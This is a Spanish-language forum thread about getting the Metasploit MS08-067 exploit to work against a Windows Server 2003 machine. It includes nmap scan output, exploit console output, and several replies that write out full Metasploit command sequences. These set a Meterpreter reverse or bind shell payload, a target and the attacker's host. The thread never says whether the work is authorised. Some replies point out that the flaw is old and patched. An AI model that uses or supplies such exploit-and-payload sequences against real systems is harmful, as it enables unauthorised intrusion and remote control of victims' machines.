Ayuda para pentesting a servidor web con Windows Server 2003

Iniciado por ElLoboHack, 12 Noviembre 2015, 13:40 PM

0 Miembros y 1 Visitante están viendo este tema.

ElLoboHack

Saludos a todos estoy intentando hacer una penetacion a un servidor con WS 2003 y el "famoso exploit " ms08_067_netapi no me funciona para nada aun teniendo el servidor el puerto 445 abierto , a continiacion el resultado del nmap

nmap -sS -sV -O 172.19.45.0

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2015-11-12 06:47 EST
Nmap scan report for pgajpl (172.19.45.0)
Host is up (0.0010s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows 98 netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 2003 or 2008 microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
2701/tcp open  cmrcservice   Microsoft Configuration Manager Remote Control service (CmRcService.exe)
3389/tcp open  ms-wbt-server Microsoft Terminal Service
Device type: general purpose
Running: Microsoft Windows XP|2003
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2
OS details: Microsoft Windows XP SP2 or Windows Server 2003 SP1 or SP2
Network Distance: 4 hops
Service Info: OSs: Windows, Windows 98; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_server_2003

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.95 seconds

Y este es el resultado del exploit:

msf exploit(ms08_067_netapi) > exploit

  • Started reverse handler on 172.19.45.77:4444
  • Automatically detecting the target...
  • Fingerprint: Windows 2003 R2 - Service Pack 2 - lang:Unknown
  • We could not detect the language pack, defaulting to English
  • Selected Target: Windows 2003 SP2 English (NX)
  • Attempting to trigger the vulnerability...
    msf exploit(ms08_067_netapi) >

    Si alguien me pudiera orientar acerca de que pueda estar pasando si es que el exploit esta desactualzado o algo se los agradeceria gracias antemano colegas.

juanvelasco

Manda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload

Shell Root

Cita de: juanvelasco en  1 Diciembre 2015, 18:41 PMManda una captura de pantalla o las opciones que le estás metiendo al exploit. Tal vez no lo tengas bien configurado o te falte por meter el payload
No se supone que al lanzar "exploit" y genera un resultado positivo/negativo es porque selecciono el payload?
Esa "vulnerabilidad" esta más que parchada, solo funciona en entornos controlados.
Por eso no duermo, por si tras mi ventana hay un cuervo. Cuelgo de hilos sueltos sabiendo que hay veneno en el aire.

0D4RUJD

Buenas!

Efectivamente, el problema que tienes es que seguramente no hayas configurado el payload.

Prueba esto:
> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set rhost 172.19.45.0
> set lport 445  (esto realmente no es necesario ya que debería venir por defecto)
> exploit

Saludos ;)

ElLoboHack

Saludos amigos no creo que el problema sea por no configurar el payload ya que lo tengo bien configurado

> use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/reverse_tcp
> set rhost 172.19.45.0
> set lport 445 
> exploit

estoy usando la configuracion que mas se utiliza por lo que pude ver, pero ami no me funciona tambien use la configuracion que dijo un companero que me respondio a qui en el foro y nada yo pienso que ese exploit ya esta inservible.

MCKSys Argentina

Cita de: ElLoboHack en 22 Enero 2016, 07:43 AM
... yo pienso que ese exploit ya esta inservible.

Piensas bien. Estás usando un exploit del 2008 en el 2015...  :P

Saludos!
MCKSys Argentina

"Si piensas que algo está bien sólo porque todo el mundo lo cree, no estás pensando."


0xFer

#6
Bueno ya estamos en el 2016 así que es más inservible todavía  :laugh:
Código (java) [Seleccionar]
int getRandomNumber(){
    return 4; //chosen by fair dice roll
              //guaranteed to be random
}

.:UND3R:.

Si te fijas el Payload está configurado para servidores que posean como lenguaje Inglés, por lo cual modificando el idioma (si es que el exploit dispone de tal configuración) por otro podría funcionar el exploit.

Saludos

Solicitudes de crack, keygen, serial solo a través de mensajes privados (PM)

steran

Que tal compas buen dia !!

este error se debe a que debes configurar el target, el error que mandas te indica que lo configures y seria asi:

> use exploit/windows/smb/ms08_067_netapi
> set rhost xx.xx.xx.xx (ip victima)
> show targets (aqui te aparece una lista de todos los tipos de targets(versiones windows) que es compitble el exploit selecciona el que te indica metasploit que es Windows 2003 SP2 English (NX) o la version a que corresponde el windows victima)
> set target Windows 2003 SP2 English (NX)
> set payload windows/meterpreter/reverse_tcp
> set lhost xx.xx.xx.xx (tu ip)
> exploit

eso deberia funcionar